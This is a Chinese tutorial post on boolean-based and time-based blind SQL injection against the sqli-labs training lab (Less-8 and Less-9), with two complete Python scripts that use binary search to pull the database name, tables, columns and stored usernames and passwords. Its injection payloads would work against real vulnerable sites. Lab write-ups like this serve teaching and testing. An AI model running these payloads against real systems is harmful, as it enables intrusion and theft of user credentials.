当前位置: 首页 > news >正文

SQL布尔盲注、时间盲注

一、布尔盲注

布尔盲注(Boolean-based Blind SQL Injection)是一种SQL注入技术,用于在应用程序不直接显示数据库查询结果的情况下,通过构造特定的SQL查询并根据页面返回的不同结果来推测数据库中的信息。这种方法依赖于SQL查询的结果是否为真或假,进而推断出数据库中的具体信息。

案例为sqlilabs中的第八关,采用二分查找

python脚本:

import requests
def get_database(URL):
    # 获取数据库名称
    s = ""
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "}  # 相当于第一个字符<={mid}条件判断为真
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                high = mid
                mid = (low + high) // 2
            else:
                low = mid + 1
                mid = (low + high) // 2
        s += chr(mid)
    print("数据库名称:" + s)


def get_table(URL):
    # 获取表名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("表的名称:" + s)


def get_column(URL):
    # 获取管理员的字段名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表的列:" + s)


def get_result(URl):
    # 获取用户名和密码信息
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}
            res = requests.get(url=URL, params=payload)
            if "You are in" in res.text:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表具体数据:" + s)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-8/index.php"
    get_database(URL)
    get_table(URL)
    get_column(URL)
    get_result(URL)

运行结果

二、时间盲注

时间盲注(Time-based Blind SQL Injection)是一种SQL注入技术,用于在应用程序没有直接回显数据库查询结果的情况下,通过构造特定的SQL查询来推测数据库中的信息。这种方法依赖于数据库处理查询时产生的延迟响应来判断条件的真假。

案例为sqlilabs中的第九关,同样为二分查找

python脚本

import requests
import datetime

def get_database(URL):
    # 获取数据库名称
    s = ""
    for i in range(1, 10):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "}  # 相当于第一个字符<={mid}条件判断为真
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                high = mid
                mid = (low + high) // 2
            else:
                low = mid + 1
                mid = (low + high) // 2
        s += chr(mid)
        print("数据库名称:" + s)


def get_table(URL):
    # 获取表名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("表的名称:" + s)


def get_column(URL):
    # 获取管理员的字段名称
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users表的列:" + s)


def get_result(URl):
    # 获取用户名和密码信息
    s = ""
    for i in range(1, 32):
        low = 32
        high = 128
        mid = (low + high) // 2
        while (high > low):
            payload = {
                "id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}
            start = datetime.datetime.now()
            res = requests.get(url=URL, params=payload)
            end = datetime.datetime.now()
            if (end - start).seconds >= 3:
                low = mid + 1
                mid = (low + high) // 2
            else:
                high = mid
                mid = (low + high) // 2
        s += chr(mid)
    print("users中的具体数据:" + s)


if __name__ == '__main__':
    URL = "http://127.0.0.1/sqlilabs/Less-9/index.php"
    # get_database(URL)
    get_table(URL)
    # get_column(URL)
    # get_result(URL)

运行结果:

相关文章:

  • [SQL Server]从数据类型 varchar 转换为 numeric 时出错
  • 排序--四种算法
  • STM32、GD32驱动TM1640原理图、源码分享
  • HCIA项目实践--RIP相关原理知识面试问题总结回答
  • 服务器,交换机和路由器的一些笔记
  • 机器学习(李宏毅)——self-Attention
  • 常见的排序算法:插入排序、选择排序、冒泡排序、快速排序
  • 利用Java爬虫按图搜索1688商品(拍立淘):实战案例指南
  • 集成学习(一):从理论到实战(附代码)
  • sqli-lab靶场学习(六)——Less18-22(User-Agent、Referer、Cookie注入)
  • 网络工程师 (35)以太网通道
  • iptables网络安全服务详细使用
  • ES节点配置的最佳实践
  • 开发指南098-logback-spring.xml说明
  • 六西格玛设计培训如何破解风电设备制造质量与成本困局
  • 错误报告:WebSocket 设备连接断开处理问题
  • qt的QSizePolicy的使用
  • 游戏引擎学习第99天
  • 【STM32】H743的以太网MAC控制器的一个特殊功能
  • DeepSeek在FPGA/IC开发中的创新应用与未来潜力
  • 道指跌逾100点,特斯拉涨近5%
  • 巴基斯坦称对印度发起军事行动
  • 江西暴雨强对流明显,专家:落雨区高度重叠,地质灾害风险高
  • 开局良好,我国第一季度广告业务收入保持较快增速
  • 北上广深均宣布下调个人住房公积金贷款利率
  • 吴勇强、高颜已任南京市委常委